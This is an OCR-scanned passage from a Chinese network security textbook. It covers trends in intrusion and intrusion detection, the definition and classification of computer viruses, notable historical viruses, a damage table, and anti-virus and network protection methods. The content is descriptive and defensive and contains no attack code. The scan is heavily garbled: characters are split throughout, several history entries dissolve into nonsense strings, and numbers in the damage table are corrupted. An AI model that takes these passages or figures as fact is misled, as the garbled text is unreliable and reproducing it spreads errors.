获得 攻击 者 的 人 侵 行为 ,为 真实 目标 制定 有 效 地 防护 策略 提供 依据 。 


2.3.4 入 侵 检 测 技术 的 发 展 方向 


2.3.4.1 人 侵 技术 的 发 展 变化 


入 侵 技 术 的 发 展 与 演化 主要 反映 在 以 下 几 个 方面 。 

(1) 入 侵 或 攻击 的 综合 化 与 复杂 化 。 由 于 网 络 防范 技术 的 多 重 化 ,攻击 的 难度 增加 ,使 
得 入 侵 者 在 实施 人 侵 或 攻击 时 往往 同时 采取 多 种 人 侵 手段 ,以 保证 入 侵 的 成 功率 ,并 可 在 攻 
击 实施 的 初期 掩盖 攻击 或 人 侵 的 真实 目的 。 

(2) 入 侵 主体 对 象 的 间接 化 , 即 实施 入侵 与 攻击 的 主体 的 隐蔽 化 。 通 过 一 定 的 技术 ,可 
以 掩盖 攻击 主体 的 源 地 址 及 主机 位 置 。 使 用 了 隐蔽 技术 后 ,对 于 被 攻击 对 象 攻击 的 主体 是 
无 法 直接 确定 的 。 

(3) 入 侵 或 攻击 的 规模 扩大 。 由 于 战争 对 电子 技术 与 网 络 技 术 的 依赖 性 越 来 越 大 , 随 
之 产生 ,发展 .逐步 升级 到 电子 战 与 信息 战 。 对 于 信息 战 , 无 论 其 规模 与 技术 都 与 一 般 意 义 
上 的 计算 机 网 络 的 入侵 与 攻击 不 可 相提并论 。 国 家 主干 通信 网 络 的 安全 是 与 主权 国家 领土 
安全 居于 同等 地 位 。 

(4) 入 侵 或 攻击 技术 的 分 布 化 。 常 用 的 入 侵 与 攻击 行为 往往 由 单机 执行 。 由 于 防范 技 
术 的 发 展 使 得 此 类 行为 不 能 奏效 ,所 谓 的 分 布 式 拒绝 服务 (DDoS) 在 很 短 时 间 内 可 造成 被 攻 
击 主机 的 瘫痪 。 此 类 分 布 式 攻击 的 信息 模式 与 正常 通信 无 差异 ,往往 在 攻击 发 动 的 初期 不 
易 被 确认 ,分 布 式 攻击 是 近期 最 常用 的 攻击 手段 。 

O 攻击 对 象 的 转移 。 入 侵 与 攻击 常 以 网 络 为 侵犯 的 主体 ,但 近期 来 的 攻击 行为 却 发 
生 了 策略 性 的 改变 ,由 攻击 网 络 改 为 攻击 网 络 的 防护 系统 。 现 已 有 专门 针对 IDS 进行 攻击 
的 报道 。 攻 击 者 详细 地 分 析 了 IDS 的 审计 方式 .特征 描述 .通信 模式 ,并 针对 IDS 的 弱点 加 
以 攻击 。 


2.3.4.2 人 侵 检 测 的 发 展 方向 


入 侵 检测 技术 的 未 来 发 展 方向 包括 以 下 几 个 方面 。 

(1) 分 布 式 人 侵 检测 。 一 方面 是 针对 分 布 式 网 络 攻击 的 检测 方法 ; 另 一 个 方面 是 使 用 
分 布 式 的 方法 来 检测 网 络 攻击 ,涉及 的 关键 技术 为 检测 协同 机 制 与 人 侵 攻 击 的 全 局 信息 
提取 。 

C2) 智能 化 入 侵 检测 ,即使 用 智能 化 的 方法 与 手段 来 进行 人 侵 检测 。 现 阶段 常用 的 智 
能 算法 有 神经 网 络 .遗传 算法 、 模 糊 技术 和 免疫 原理 等 方法 ,这 些 方法 常用 于 入 侵 特 征 的 辩 
识 与 泛 化 。 利 用 专家 系统 的 思想 来 构建 人 侵 检测 系统 也 是 常用 的 方法 之 一 。 

(3) 全 面 的 安全 防御 方案 ,即使 用 安全 工程 风险 管理 的 思想 与 方法 来 处 理 网 络 安全 问 
题 ,将 网 络 安 全 作为 一 个 整体 工程 来 处 理 。 从 管理 ,网 络 结构 、 加 密 通道 防火墙、 病毒 防护 
和 入 侵 检测 多 方位 对 所 关注 的 网 络 作 出 评估 ,并 提出 可 行 的 全 面 解决 方案 。 
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2.4 计算 机 病毒 学 


2.4.1 计算 机 病毒 定义 


计算 机 病毒 (computer virus) 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 中 被 
明确 定义 ,病毒 指 “ 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计 
算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

计算 机 病毒 往往 会 利用 计算 机 操作 系统 的 弱点 进行 传播 。 提 高 系统 的 安全 性 是 防 病毒 
的 一 个 重要 方面 ,但 过 于 强调 提高 系统 的 安全 性 将 使 系统 多 数 时 间 用 于 病毒 检查 ,使 系统 失 
去 了 可 用 性 、 实 用 性 和 易 用 性 ; 另 一 方面 ,信息 保密 的 要 求 让 人 们 在 泄密 和 防 病毒 之 间 无 法 
选择 。 病 毒 与 反 病 毒 将 作为 一 类 对 抗 技术 长 期 存在 ,两 种 技术 都 将 随 计算 机 技术 的 发 展 而 
得 到 长 期 的 发 展 。 

首先 ,应 该 明确 病毒 不 是 来 源 于 突 发 或 偶然 的 原因 。 一 次 突 发 的 停电 和 偶然 的 错误 ,会 
在 计算 机 的 磁盘 和 内 存 中 产生 一 些 乱 码 和 随机 指令 ,但 这 些 代码 是 无 序 和 混乱 的 。 病 毒 则 
是 一 种 精巧 严谨 的 代码 ,按照 严格 的 秩序 组 织 起 来 ,与 所 在 的 系统 网 络 环境 相 适 应 和 配合 起 
来 ,病毒 不 会 通过 偶然 形成 ,并 且 需 要 有 一 定 的 长 度 ,这 个 基本 的 长 度 从 概率 上 来 讲 是 不 可 
能 通过 随机 代码 产生 的 。 现 在 流行 的 病毒 都 是 人 为 故意 编写 的 ,多 数 病毒 可 以 找到 作者 和 
产地 信息 ,从 大 量 的 统计 分 析 来 看 ,病毒 作者 主要 情况 和 目的 是 : 一 些 天 才 的 程序 员 为 了 表 
现 自己 和 证 明 自 己 的 能 力 , 出 于 对 上 司 的 不 满 , 为 了 好 奇 , 为 了 报复 ,为 了 祝贺 或 求爱 ,为 了 
得 到 控制 口令 ,等 等 。 当 然 也 有 政治 .军事 和 宗教 等 方面 的 需求 而 专门 编写 的 ,其 中 也 包括 
一 些 病 毒 研究 机 构 和 黑客 的 测试 病毒 。 


2.4.1.1 病毒 特征 


计算 机 病毒 具有 以 下 几 个 特点 。 

(1) 寄生 性 : 计算 机 病毒 寄生 在 其 他 程序 之 中 , 当 执行 这 个 程序 时 ,病毒 就 起 破坏 作 
用 ,而 在 未 启动 这 个 程序 之 前 , 它 是 不 易 被 人 发 觉 的 。 

(2) 传染 性 : 计算 机 病毒 不 但 本 身 具有 破坏 性 ,更 具有 传染 性 ,一 旦 病毒 被 复制 或 产生 
变种 ,其 速度 之 快 令 人 难以 预防 。 传 染 性 是 病毒 的 基本 特征 。 计 算 机 病毒 会 通过 各 种 渠道 
从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 机 ,在 某 些 情况 下 造成 被 感染 的 计算 机 工作 失 
常 甚至 瘫痪 。 是 否 具有 传染 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 的 条 件 。 病 毒 程 
序 通过 修改 磁盘 扇 区 信息 或 文件 内 容 将 自身 嵌入 到 系统 应 用 程序 内 部 ,被 嵌入 的 程序 称 为 
宿主 程序 。 

(3) 潜伏 性 : 有 些 病毒 像 定 时 炸弹 一 样 ,发 作 时 间 是 预先 设计 好 的 。 例 如 黑色 星期 五 
病毒 ,不 到 预定 时 间 无 法 觉察 , 当 条 件 具 备 时 则 会 产生 对 系统 的 巨大 破坏 。 潜 伏 性 越 好 ,其 
在 系统 中 的 存在 时 间 就 会 越 长 ,病毒 的 传染 范围 就 会 越 大 。 潜 伏 性 的 第 一 种 表现 是 指 病毒 
程序 不 用 专用 检测 程序 就 无 法 检查 出 来 ;潜伏 性 的 第 二 种 表现 是 指 计算 机 病毒 的 内 部 往往 
有 一 种 触发 机 制 ,不 满足 触发 条 件 时 ,计算 机 病毒 除了 传染 外 不 做 任何 破坏 。 

(4) 隐蔽 性 : 计算 机 病毒 具有 很 强 的 隐蔽 性 ,有 的 可 以 通过 病毒 软件 检查 出 来 ,有 的 根 
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本 就 查 不 出 来 ,这 类 病毒 处 理 起 来 通常 很 困难 。 
(5) 破坏 性 : 计算 机 中 毒 后 ,会 导致 正常 的 程序 无 法 运行 ,删除 或 破坏 计算 机 内 的 
xf. 


2.4.1.2. 病毒 命名 


可 以 通过 杀毒 软件 报告 中 出 现 的 病毒 名 来 判断 该 病毒 的 一 些 共有 的 特性 。 
病毒 名 的 一 般 格式 为 : 


< 病毒 前 级 > .< 病毒 名 > .< 病毒 后 级 > 


病毒 前 级 是 指 一 个 病毒 的 种 类 ,用 来 区 别 病毒 的 种 族 。 不 同 种 类 的 病毒 ,其 前 级 也 是 不 
同 的 。 例 如 ,常见 的 木马 病毒 前 级 Trojan ,蠕虫 病毒 的 前 级 是 Worm 等 。 

病毒 名 是 指 一 个 病毒 的 家 族 特 征 , 用 来 区 别 和 标识 病毒 家 族 。 例 如 ,著名 的 CIH 病毒 
的 家 族 名 都 是 统一 的 CIH ,振荡 波 蠕虫 病毒 的 家 族 名 是 Sasser, 

病毒 后 级 是 指 一 个 病毒 的 变种 特征 ,用 来 区 别 具 体 某 个 家 族 病毒 的 变种 。 一 般 都 采用 
英文 中 的 26 个 字母 来 表示 。 例 如 ,Worm. Sasser. b 是 指 振荡 波 蠕虫 病毒 的 变种 B, 一 般 称 
为 “振荡 波 B 变种 ”或 者 “振荡 波 变种 B”。 

病毒 的 主 名 称 是 由 分 析 员 根据 病毒 体 的 特征 字符 串 、 特 定 行 为 或 者 所 使 用 的 编译 平台 
来 确定 的 ,如 果 无 法 确定 则 可 以 用 字符 串 Agent 来 代替 主 名 称 , 小 于 10KB 大 小 的 文件 可 以 
命名 为 Small。 

版 本 信息 只 允许 为 数字 ,对 于 版 本 信息 不 明确 的 不 加 版 本 信息 。 

如 果 病 毒 的 主 行为 类 型 .行为 类 型 .宿主 文件 类 型 和 主 名称 均 相同 , 则 认为 是 同一 家 族 
的 病毒 ,这 时 需要 用 变种 号 来 区 分 不 同 的 病毒 记录 。 如 果 一 位 版 本 号 不 够 用 则 最 多 可 以 扩 
展 3 位 ,并 且 都 均 为 小 写字 母 a 一 z。 如 aa、ab、aaa、aab, 以 此 类 推 ,由 系统 自动 计算 ,不 需要 
人 工 输入 或 选择 。 


2.4.2 计算 机 病毒 分 类 


计算 机 病毒 有 多 种 分 类 方式 。 

1. 按照 计算 机 病毒 存在 的 媒体 分 类 

按 计算 机 病毒 存在 的 媒体 进行 分 类 ,计算 机 病毒 可 以 分 为 网 络 病毒 ,文件 病毒 .引导 型 
病毒 。 网 络 病毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ,文件 病毒 感染 计算 机 中 的 
文件 (如 COM、EXE、DOC 等 ) ,引导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 刷 区 
(MBR)。 还 有 这 3 种 情况 的 混合 型 ,例如 ,多 型 病毒 (文件 和 引导 型 ) 感 染 文 件 和 引导 扇 区 
两 种 目标 ,这 样 的 病毒 通常 都 具有 复杂 的 算法 ,它们 使 用 非常 规 的 办 法 侵入 系统 ,同时 使 用 
了 加 密 和 变形 算法 。 

2. 按照 计算 机 病毒 的 传染 方法 分 类 

按照 计算 机 病毒 传染 的 方法 进行 分 类 ,计算 机 病毒 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 
驻 留 型 病毒 感染 计算 机 后 ,把 自身 的 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 接 系统 
并 且 合 并 到 操作 系统 中 去 ,处 于 激活 状态 ; 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 不 感染 计算 机 
内 存 。 
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3. 按 计 算 机 病毒 的 破坏 能 力 分 类 

根据 病毒 破坏 的 能 力 进行 划分 ,计算 机 病毒 可 分 为 以 下 几 种 : 

(1) 无 害 型 病毒 : 除了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 其 他 影响 。 

(2) 无 危险 型 病毒 : 这 类 病毒 仅仅 是 减少 内 存 、 显 示 图 像 和 发 出 声音 。 

(3) 危险 型 病毒 : 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

(4) 非常 危险 型 病毒 : 这 类 病毒 删除 程序 、 破 坏 数 据 、 清 除 系 统 内 存 区 和 操作 系统 中 重 
要 的 信息 ,由 病毒 引起 其 他 程序 产生 的 错误 也 会 破坏 文件 和 扇 区 。 

4. 按 计算 机 病毒 特有 的 算法 分 类 

根据 计算 机 病毒 特有 的 算法 ,计算 机 病毒 可 以 分 为 以 下 几 种 : 

(1) 伴随 型 病毒 : 这 一 类 病毒 并 不 改变 文件 本 身 ,它们 根据 算法 产生 EXE 文件 的 伴随 
体 , 具 有 同样 的 名 字 和 不 同 的 扩展 名 (COM)。 例 如 , XCOPY. EXE 的 伴随 体 是 XCOPY 
.COM。 病 毒 把 自身 写 入 COM 文件 并 不 改变 EXE 文件, 当 DOS 加 载 文件 时 ,伴随 体 优先 
被 执行 ,再 由 伴随 体 加 载 执 行 原来 的 EXE 文件 。 

(2)“ 蠕 虫 ”型 病毒 : 通过 计算 机 网 络 传播 ,不 改变 文件 和 资料 信息 ,利用 网 络 从 一 台 机 
器 的 内 存 传播 到 其 他 机 器 的 内 存 , 计 算 网 络 地 址 ,将 自身 的 病毒 通过 网 络 发 送 。 

(3) 寄生 型 病毒 : 除了 伴随 和 ”蠕虫 ”型 病毒 ,其 他 病毒 均 可 称 为 寄生 型 病毒 ,它们 依附 
在 系统 的 引导 扇 区 或 文件 中 ,通过 系统 的 功能 进行 传播 。 

CD 诡秘 型 病毒 : 它们 一 般 不 直接 修改 DOS 中 断 和 局 区 数据 ,而 是 通过 文件 缓冲 区 进 
行 DOS 内 部 修改 ,利用 DOS 空闲 的 数据 区 进行 工作 。 

(5) 变型 病毒 (又 称 幽灵 病毒 ): 这 一 类 病毒 使 用 复杂 的 算法 ,使 自己 每 传播 一 份 都 具 
有 不 同 的 内 容 和 长 度 。 一 般 由 一 段 混 有 无 关 指 令 的 解码 算法 和 被 变化 过 的 病毒 体 组 成 。 

5. 按 计算 机 病毒 的 攻击 目标 分 类 

根据 病毒 的 攻击 目标 ,计算 机 病毒 可 以 分 为 以 下 几 种 : 

(1) DOS 病毒 : 针对 DOS 操作 系统 开发 的 病毒 。 由 于 Windows 9x 病毒 的 出 现 , DOS 
病毒 几乎 绝迹 。 但 DOS 病毒 在 Windows 9x 环境 中 仍 可 以 进行 感染 活动 ,因此 若 执行 染 毒 
文件 ,Windows 9x 用 户 的 系统 也 会 被 感染 。 

(2) Windows 病毒 : 针对 Windows 9x 操作 系统 的 病毒 。 现 在 的 计算 机 用 户 一 般 都 安 
装 Windows 系统 ,其 中 最 典型 的 病毒 有 CIH 病毒 。 一 些 Windows 病毒 不 仅 在 Windows 
9x 上 正常 感染 ,还 可 以 感染 Windows NT 上 的 其 他 文件 。 

(3) 其 他 系统 病毒 : 主要 攻击 Linux, UNIX 和 OS2 及 嵌入 式 系统 的 病毒 。 由 于 系统 本 
身 的 复杂 性 ,这 类 病毒 数量 不 是 很 多 。 

6. 按 计算 机 病毒 的 链接 方式 分 类 

根据 链接 方式 ,计算 机 病毒 可 分 为 以 下 几 种 : 

CD 源码 型 病毒 : 该 病毒 攻击 高 级 语言 编写 的 程序 ,在 高 级 语言 所 编写 的 程序 编译 前 
插入 到 源 程序 中 ,经 编译 成 为 合法 程序 的 一 部 分 。 

(2) BLAUE E: 这 种 病毒 是 将 自身 嵌入 到 现 有 程序 中 ,把 计算 机 病毒 的 主体 程序 与 
其 攻击 的 对 象 以 插入 的 方式 链接 。 这 种 计算 机 病毒 是 难以 编写 的 ,一 旦 侵入 程序 体 后 也 较 
难 消 除 。 如 果 同 时 采用 多 态 性 病毒 技术 .超级 病毒 技术 和 隐蔽 性 病毒 技术 ,将 给 当前 的 反 病 
毒 技术 带 来 严峻 的 挑战 。 
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(3) 外 壳 型 病毒 : 外 壳 型 病毒 将 其 自身 包围 在 主 程序 的 四 周 , 对 原来 的 程序 不 作 修 改 。 
这 种 病毒 最 为 常见 ,易于 编写 ,也 易于 发 现 ,一 般 测试 文件 的 大 小 即 可 察觉 。 

(4) 操作 系统 型 病毒 : 这 种 病毒 用 自身 的 程序 加 入 或 取代 部 分 操作 系统 进行 工作 , 具 
有 很 强 的 破坏 力 , 可 以 导致 整个 系统 的 瘫痪 。 圆 点 病毒 和 大 麻 病 毒 就 是 典型 的 操作 系统 型 
病毒 。 

2.4.3 病毒 的 危害 与 防范 


1983 年 11 月 3 日 , 弗 雷 德 . 科 恩 (Fred Cohen) 博 士 研制 出 一 种 在 运行 过 程 中 可 以 复 
制 自身 的 破坏 性 程序 。 伦 ， 艾 德 勒 曼 (Len Adleman) 将 这 种 破坏 性 程序 命名 为 计算 机 病毒 
(computer viruses) ,并 在 每 周一 次 的 计算 机 安全 讨论 会 上 正式 提出 ,8 小 时 后 专家 们 在 
VAX11/750 计算 机 系统 上 成 功 运行 该 程序 ,这 样 ,第 一 个 病毒 实验 成 功 。 

计算 机 病毒 之 所 以 被 称 为 病毒 ,是 因为 其 具有 传染 性 的 本 质 。 传 统 渠 道 通常 有 以 下 
几 种 。 

CD 通过 介质 。 由 于 使 用 带 有 病毒 的 介质 ,使 机 器 感染 病毒 发 病 , 并 传染 给 未 被 感染 
的 “干净 ”的 移动 介质 。 大 量 的 数据 交换 以 及 合法 或 非法 的 程序 复制 会 加 速 病毒 感染 。 

(2) 通过 硬盘 。 通 过 硬盘 传染 也 是 重要 的 渠道 , 由 于 带 有 病毒 机 器 移 到 其 他 地 方 使 
用 、 维 修 等 ,使 病毒 发 生 扩散 。 

(3) 通过 网 络 。 这 种 传染 扩散 极 快 , 能 在 很 短 时 间 内 传 遍 网 络 上 的 机 器 。 一 种 威胁 来 
自 文件 下 载 , 这 些 被 浏览 的 或 被 下 载 的 文件 可 能 存在 病毒 ; 另 一 种 威胁 来 自 电 子 邮件 ,大 多 
数 邮 件 系统 提供 了 在 网 络 间 传 送 附 带 格式 化 文档 邮件 的 功能 ,网 络 使 用 的 简易 性 和 开放 性 
使 得 这 种 威胁 越 来 越 严重 。 


2.4.3.1 计算 机 病毒 危害 


世界 上 已 经 出 现 的 最 著名 的 计算 机 病毒 主要 有 以 下 几 类 。 

1. Elk Cloner(1982 年 ) 

Elk 病毒 被 看 作 攻 击 个 人 计算 机 的 第 一 款 全 球 病毒 , 它 通过 苹果 Apple M 软盘 进行 传 
播 。 这 个 病毒 被 放 在 一 个 游戏 磁盘 上 ,可 以 使 用 49 次 ;在 第 50 次 使 用 的 时 候 , 它 并 不 运行 
游戏 ,取而代之 的 是 打开 一 个 空白 屏幕 ,并 显示 一 首 短 诗 。 

2. Brain(1986 ££) 

Brain 病毒 是 第 一 款 攻 击 DOS 操作 系统 的 病毒 ,可 以 感染 360K B. 软盘 ,该 病毒 会 填充 
软盘 上 全 部 未 用 的 空间 ,而 导致 它 不 能 再 被 使 用 。 

3. Morris(1988 年 ) 

Morris 病毒 程序 利用 了 系统 存在 的 弱点 进行 人 侵 ,Morris 设计 的 最 初 的 目的 并 不 是 搞 
破坏 ,而 是 用 来 测量 网 络 的 大 小 。 但 是 ,由 于 程序 的 循环 没有 处 理 好 ,计算 机 会 不 停 地 执行 ， 

4. CIH(1998 年 ) 

CIH 病毒 是 迄今 为 止 破坏 性 最 严重 的 病毒 ,也 是 世界 上 首 例 破坏 硬件 的 病毒 。 它 发 作 
时 不 仅 破坏 硬盘 的 引导 区 和 分 区 表 , 而 且 破 坏 计算 机 系统 BIOS, 导 致 主板 损坏 。 此 病毒 是 
由 台湾 大 学 生 陈 盈 豪 研制 的 。 
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5. Melissa(1999 年 ) 

Melissa 病毒 是 最 早 通过 电子 邮件 传播 的 病毒 之 一 , 当 用 户 打 开 一 封 电子 邮件 的 附件 ， 
病毒 会 自动 发 送 到 用 户 通讯 短 中 的 前 50 个 地 址 ,因此 这 个 病毒 在 数 小 时 之 内 传 遍 全 球 。 

6. Love bug(2000 年 ) 

Love bug Wipe aren dn dat ; 它 把 病毒 伪装 成 一 封 求 爱 信 来 欺骗 
收 件 人 打开 。 这 个 病毒 以 其 传播 速度 和 范围 让 安全 专家 吃惊 。 在 数 小 时 之 内 ,这 个 小 小 的 
ee en 

7.“ 红 色 代码 ”(2001 年 ) 

2 pg 这 个 自我 复制 的 恶意 病毒 利 
用 了 Microsoft IIS 服务 器 中 的 一 个 漏洞 。 该 蠕虫 病毒 具有 一 个 更 恶毒 的 版 本 ,被 称 作 红 色 
代码 工 ,被 感染 的 系统 性 能 会 严重 下 降 。 

8. Nimda(2001 ££) 

Nimda 是 历史 上 传播 速度 最 快 的 病毒 之 一 ,在 上 线 之 后 的 22 分 钟 之 后 就 成 为 传播 最 广 
的 病毒 。 

9. "mdi" (2003 年 ) 

“冲击 波 ” 病 毒 的 英文 名 称 是 Blaster. 36 E EK JJ Lovsan 或 Lovesan, 它 利用 了 Microsoft 
软件 中 的 一 个 缺陷 ,对 系统 端口 进行 疯狂 攻击 ,可 以 导致 系统 崩溃 。 

0. "AXE" (2004 年 ) 
“震荡 波 ” 病 毒 是 又 一 个 利用 Windows tt ga ho iti dog HE. np EA Si Scr E SL DET AS IST 
. "RETE ETE" (2007 年 ) 
Wer tatur 图 标 变 成 熊猫 烧香 ,并 使 它们 不 能 应 用 。 
“扫荡 波 ”(2008 年 ) 

ey RO 大 批 用 户 关闭 自动 更 新 以 后 ,加 剧 
了 这 个 病毒 的 蔓延 ,可 以 导致 被 攻击 者 的 机 器 被 完全 控制 。 

13.“ 木 马 下 载 器 ”(2009 年 ) 

di 1000— 2000 个 不 等 的 木马 病毒 ,导致 系统 崩溃 。 

.“ 和 鬼 影 " 病 毒 (2010 年 ) 
影 ” 病 毒 成 功 运行 后 ,在 进程 中 和 系统 启动 加 载 项 里 找 不 到 任何 异常 ,同时 即使 格式 
化 重 装 系统 ,也 无 法 彻底 清除 该 病毒 。 
K 2.4. 1 显示 了 近年 来 几 个 病毒 带 来 的 巨大 危害 。 


表 2.4.1 重大 病毒 危害 列表 

















年 份 攻击 行为 发 起 者 受害 PC 数目 损失 金额 /美元 
2006 木马 和 恶意 软件 破坏 程度 不 可 估计 损失 金额 不 可 估计 
2005 木马 破坏 程度 不 可 估计 损失 金额 不 可 估计 
2004 Worm_Sasser (#2 i$ BE) 破坏 程度 不 可 估计 损失 金额 不 可 估计 
2003 Worm_MSBLAST( 冲 击 波 ) 超过 140 万 台 损失 金额 不 可 估计 
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年 攻击 行为 发 起 者 受害 PC 数目 损失 金额 /美元 
2003 SQL Slammer 超过 20 万 台 9.5 {Z~12 亿 
2002 Klez 超过 600 74 90 亿 
2001 RedCode 超过 10074 26 亿 
2001 NIMDA 超过 800 74 60 亿 
2000 Love Letter 破坏 程度 不 可 估计 88 亿 
1999 CIH 超过 6000 万 台 近 100 亿 











2.4.3.2. 反 病 毒 技术 


从 反 病 毒 产 品 对 计算 机 病毒 的 作用 来 讲 , 反 病 毒 技术 可 以 分 为 病毒 预防 技术 ,病毒 检测 

l. 病毒 预防 技术 

计算 机 病毒 的 预防 技术 是 指 通过 一 定 的 技术 手段 防止 计算 机 病毒 对 系统 的 传染 和 破坏 
的 技术 , 即 一 种 行为 规则 判定 技术 。 具 体 来 说 ,计算 机 病毒 的 预防 是 通过 阻止 计算 机 病毒 进 
入 系统 内 存 或 阻止 计算 机 病毒 对 磁盘 的 操作 (尤其 是 写 操作 ) 来 实现 的 。 

病毒 预防 技术 包括 磁盘 引导 区 保护 .加密 可 执行 程序 . 读 写 控制 技术 和 系统 监控 技术 
等 。 计 算 机 病毒 的 预防 应 用 包括 对 已 知 病毒 的 预防 和 对 未 知 病毒 的 预防 两 个 部 分 。 目 前 ， 
对 已 知 病毒 的 预防 可 以 采用 特征 判定 技术 或 静态 判定 技术 ,而 对 未 知 病毒 的 预防 则 是 一 种 
行为 规则 的 判定 技术 , 即 动态 判定 技术 。 

2. 病毒 检测 技术 

计算 机 病毒 的 检测 技术 是 指 通 过 一 定 的 技术 手段 判定 出 特定 计算 机 病毒 的 技术 。 主 要 
有 两 种 病毒 检测 技术 : 一 种 是 根据 计算 机 病毒 的 关键 字 、 特 征程 序 段 内 容 、 病 毒 特征 及 传染 
方式 .文件 长 度 的 变化 ,在 特征 分 类 的 基础 上 建立 的 病毒 检测 技术 ; 另 一 种 是 不 针对 具体 病 
毒 程序 的 自身 校 验 技术 , 即 对 某 个 文件 或 数据 段 进行 检验 和 计算 并 保存 其 结果 ,以 后 定期 或 
不 定期 地 以 保存 的 结果 对 该 文件 或 数据 段 进 行 检验 , 若 出 现 差 异 就 表示 该 文件 或 数据 段 完 
整 性 已 遭 到 破坏 ,感染 上 了 病毒 ,从 而 检测 到 病毒 的 存在 。 

3. 病毒 清除 技术 

计算 机 病毒 的 清除 技术 是 计算 机 病毒 检测 技术 发 展 的 必然 结果 ,是 计算 机 病毒 传染 程 
序 的 一 种 逆 过 程 。 目 前 ,清除 病毒 大 都 是 在 某 种 病毒 出 现 后 ,通过 对 其 进行 分 析 研究 而 研制 
出 具有 相应 解毒 功能 的 软件 。 这 类 软件 技术 发 展 往往 是 被 动 的 , 带 有 滞后 性 。 由 于 计算 机 
软件 所 要 求 的 精确 性 ,解毒 软件 有 其 局 限 性 ,对 变种 病毒 的 清除 无 能 为 力 。 


2.4.4 病毒 防护 与 检测 策略 
在 网 络 环境 下 ,防范 病毒 问题 显得 尤其 重要 。 因 此 ,采用 高 效 的 网 络 病毒 防护 方法 和 技 
术 是 一 件 非常 重要 的 事情 。 
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2.4.4.1 病毒 防护 技术 


网 络 病毒 防护 有 以 下 4 种 基本 方法 。 

1. 基于 网 络 目录 和 文件 安全 性 方法 

网 络 上 公用 目录 或 共享 目录 的 安全 性 防范 措施 ,对 于 防止 病毒 在 网 上 传播 起 到 积极 作 
用 。 至 于 网 络 用 户 的 私人 目录 ,由 于 其 限于 个 别 使 用 ,病毒 很 难 传播 给 其 他 用 户 。 采 用 基于 
网 络 目 录 和 文件 安全 性 的 方法 对 防止 病毒 起 到 了 一 定 作 用 ,但 是 这 种 方法 毕竟 是 基于 网 络 
操作 系统 的 安全 性 的 设计 ,存在 着 局 限 性 。 

2. 采用 工作 站 防 病毒 芯片 

这 种 方法 是 将 防 病毒 功能 集成 在 一 块 芯 片上 ,安装 在 网 络 工 作 站 上 ,以便 经 常 性 地 保护 
工作 站 及 其 通 往 服务 器 的 路 径 。 将 工作 站 存 取 控 制 与 病毒 保护 能 力 合 二 为 一 插 在 网 卡 的 
EPROM 模 内 ,用 户 也 可 以 免除 许多 烦琐 的 管理 工作 。 

3. 采用 Station Lock 网 络 防 病毒 方法 

Station Lock 是 著名 防 病毒 产品 开发 商 Trend Micro Devices 公司 的 新 一 代 网 络 防 病 
毒 产品 。 其 防毒 概念 是 建立 在 "病毒 必须 执行 有 限 数量 的 程序 之 后 , 才 会 产生 感染 效力 ”的 
基础 之 上 。 引 导 型 病毒 必须 使 用 系统 的 BIOS 功能 调用 ,文件 型 病毒 必须 将 自己 所 有 的 程 
序 代码 复制 到 另 一 个 系统 执行 文件 时 才能 使 之 感染 。 混 合 型 病毒 和 多 型 体 病毒 在 实施 感染 
之 前 也 必须 获取 系统 控制 权 , 才 能 运行 病毒 体 程序 而 实施 感染 。Station Lock 就 是 通过 这 
些 特 点 ,用 间接 方法 观察 ,精确 地 预测 病毒 的 攻击 行为 。 其 作用 对 象 包括 多 型 体 病毒 和 未 来 
型 病毒 。 

4. 基于 服务 器 的 防 病毒 技术 

服务 器 是 网 络 的 核心 ,一 旦 服务 器 被 病毒 感染 ,就 会 使 服务 器 无 法 启动 ,整个 网 络 陷 了 
瘫痪 ,造成 灾难 性 后 果 。 目 前 ,基于 服务 器 的 防治 病毒 方法 大 都 采用 了 NLM( NetWare 
Load Module) 技 术 以 NLM 模块 方式 进行 程序 设计 ,以 服务 器 为 基础 ,提供 实时 扫描 病毒 能 
力 。 目 前 市 场 上 的 产品 ,如 Central Point 公司 的 AntiVirus for Networks, Intel 公司 的 
LANdesk Virus Protect 以 及 南京 威 尔 德 电脑 公司 的 Lanclear for NetWare 等 ,都 是 采用 了 
以 服务 器 为 基础 的 防 病毒 技术 。 这 些 产 品 的 目的 都 是 保护 服务 器 ,使 服务 器 不 被 感染 。 这 
FÉ ,病毒 也 就 失去 了 传播 途径 ,因而 从 根本 上 杜绝 了 病毒 在 网 上 蔓延 。 

在 上 述 4 种 网 络 防毒 技术 中 , Station Lock 是 一 种 针对 病毒 行为 的 防治 方法 ,Station 
Lock 目前 已 能 提供 Intel 以 太 网 络 接口 卡 支持 ,而 且 未 来 还 将 支持 各 种 普及 型 的 以 太 令 牌 
环 (tokenrring) 网 络 接口 卡 。 基 于 服务 器 的 防治 病毒 方法 的 优势 表现 在 可 以 集中 式 扫 毒 , 能 
实现 实时 扫描 功能 ,软件 升级 方便 。 特 别 是 当 连 网 的 机 器 很 多 时 ,利用 这 种 方法 比 为 每 台 工 
作 站 都 安装 防 病毒 产品 要 节省 成 本 。 其 代表 性 的 产品 有 LANdesk,LANClear for NetWare 
5. 

5. 实时 反 病 毒 技术 

实时 反 病 毒 技术 一 向 为 反 病毒 界 所 看 好 ,被 认为 是 比较 彻底 的 反 病 毒 解 决 方案 。 多 年 
来 其 发 展 之 所 以 受到 制约 ,一 方面 是 因为 它 需要 占用 一 部 分 系统 资源 而 降低 系统 性 能 ; 另 一 
方面 是 因为 它 与 其 他 软件 (特别 是 操作 系统 ) 的 兼容 性 问题 始终 没有 得 到 很 好 的 解决 。 

随 着 硬件 处 理 速 度 的 不 断 提高 .实时 化 反 病毒 技术 所 造成 的 系统 负荷 已 经 降低 到 了 可 
